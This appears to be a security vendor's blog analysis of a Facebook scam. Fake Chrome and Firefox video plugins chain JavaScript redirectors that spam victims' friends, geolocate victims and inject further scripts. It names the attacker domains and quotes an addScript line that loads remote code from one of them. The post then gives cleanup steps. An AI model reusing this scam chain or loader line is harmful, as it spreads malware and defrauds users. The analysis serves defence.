Introduction
We have been coming across many facebook scams. This sample which is taken from one of such scams has an interesting feature in it. It checks for the location of affected victim, and based on the country where the victim is located, additional scripts are injected. The victim is redirected to many other sites that uses Facebook API, post scam on Victim’s friends’ pages and additional malicious files could be downloaded to the user machine.
Infection Vector
The user is tricked to click scam page attached on his friend ‘s page or in public posts page of Facebook. The scams hold luring pictures and words like “Hey See This Now ” etc. Once the user clicks this link, he will be redirected to a link where he is asked to download a plugin to watch the video. This link checks whether the user is using Chrome or Firefox and then installs the malicious plugin as the missing plugin to watch the video.
File with extension *.xpi is a plugin for Firefox whereas file with *.crx extension is Chrome plugin.
Victim attacked using Chrome Browser
Fig 1 – Plugin required notification with Installation button
Fig 2 -Once user clicks “Install Plugin”
Fig 3: Plugin added to Chrome Browser
Victim attacked using Firefox browser
Fig 4: Scam requesting the victim to install malicious plugin
Fig 5: Plugin added to Firefox Browser
We see the spelling different (“Dvix”) from the earlier Youtube DIVX plugins (plugin for Google chrome).
JavaScript Redirectors working silently in background.
The continuous redirection which the victim would face are due to few javascript redirector files, which work silently in the background. They are shown below.
Script.js
Script.js has function addscript() which redirects to another site “*****.info/new/extra.js” to download extra.js.
Extra.js
Extra.js further redirects to beessa.info/new and downloads 3 new javascript files (fuction.js, fuction1.js, love.js) which are the most interesting ones .
We can see below the new javascript files which Extra.js would download to victim’s machine on redirections.
Extra.js also has code to inject an iframe with source hardcoded as http://faceboc0k.blogspot.com/
We can see that the link is repeatedly called to spam users.
Function.js – has the luring message which appears on Victims ‘ wall
Function.js has code to redirect the user to several other pages. It has code about the message that is used on the malicious link that promises the user about the video. It has the Ajax command to post on the user ‘s wall.
Redirect.js
This *.js file holds the most interesting feature where function ” geoip_country_code()” is used to get the user s location by getting the country code . A total of 11 countries are checked.
If the return value of the function is any of the 11 country code, then the following code gets injected. This code is similar to SMS trojans which come bundled along with Android applications.
addScript(http://beessaal.info/new/redirect2.js);
Love.js checking whether the victim is located in Pakistan
This JS file loads a script from the following url (geoip.js), which retrieves the location of the victim and check if the victim is from Pakistan (PK). If so, do another script injection for redirection.
Values retrieved by geoio.js
geoio.js retrieves the value of current location (country name, city, region, latitude , longitude, etc..)of the user.
Using the information gathered using geoio.js, the victim encounters a message box where he is announced as the winner from his locality for the day.
Inspecting DOM, gives the information on the message that needs to be brought up on browser before exiting the browser.
The redirection happens for victim to several pages and finally lands up on a page stating some survey or Prize Winning notification.
Fake Game page that appears at the end of redirections.
Cleaning up the victim s browsers and Facebook wall
Victim needs to uninstall the browser extension that is spamming your Facebook contacts. In Firefox, go to Tools and select Add-ons. Select Extensions and locate the offending extension and click the Disable button and restart the browser.
In Google Chrome, click the wrench icon, click Tools and select Extensions, and again locate the offending Extension and remove it.
On Facebook wall, go to the icon at the top right hand corner of each post and select Delete Post from the drop down menu. Facebook comes to know about it, and they would block the same from their end.
Our Advice to Customers
As we are aware of the increasing popularity of Facebook across the globe and its number of users, malware authors are also coming up with new scams everyday. They get heavily paid because of this fact. Facebook is also in a continous effort to secure its users. We would advice users not to click on any link on Facebook which promises of free gifts or Celebrity Scandal video links etc. Kindly do a browsing about the link before clicking and report it as a spam if you find it yourself on or any of your friends wall.
Leave a reply
